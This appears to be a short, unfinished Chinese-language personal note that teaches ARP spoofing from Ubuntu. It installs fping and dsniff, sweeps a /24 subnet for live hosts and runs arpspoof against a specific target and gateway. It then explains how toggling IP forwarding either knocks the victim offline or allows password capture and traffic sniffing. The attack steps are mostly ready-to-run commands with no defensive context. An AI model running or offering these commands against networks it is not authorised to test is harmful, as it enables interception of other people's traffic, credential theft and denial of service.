第一步 apt install fping
第二步 apt install dsniff
fping 命令
系统自带的ping命令 是针对单个ip的
针对多个ip 使用fping
fping -ag 192.168.0.1/24 扫描内网所有192.168.0.X下的所有ip
arpsoopf 命令
-i 网卡名 -t 目标ip 默认网关ip
实战
fping -ag 192.168.0.1/24
ifconfig //查看网卡
arpspoof -i ens33 -t 192.168.0.71 192.168.0.1
因为我这里是ubuntu 所以命令需要sudo权限
步骤就这么点
需要停止只需要ctrl+c 就行了
题外篇
less /proc/sys/net/ipv4/ip_forward
查看默认是否内网转发的 一般默认值为0 (0 为不转发 1 为转发)
echo 0 > /proc/sys/net/ipv4/ip_forward 关掉转发
echo 1 > /proc/sys/net/ipv4/ip_forward 开启转发
这个流量转发的作用是 当你使用arpsoopf 做arp断网攻击的话 (即:是目标断网)启用 0
反之 若是要做 密码抓取 arp欺骗 或者流量监听什么的 开启1 就好
(通常 这是在kali上去玩的 这样可以避免少踩坑 因为我比较顺手 ubuntu
所以我有遇到的坑
)
当然 还有一个坑是 arp欺骗成功运行 也less查看了 默认使用不转发了
但是目标机并没有像网上所说的那样断网 本文笔记还没写完 后续我有空会去弄清楚 把笔记完善的
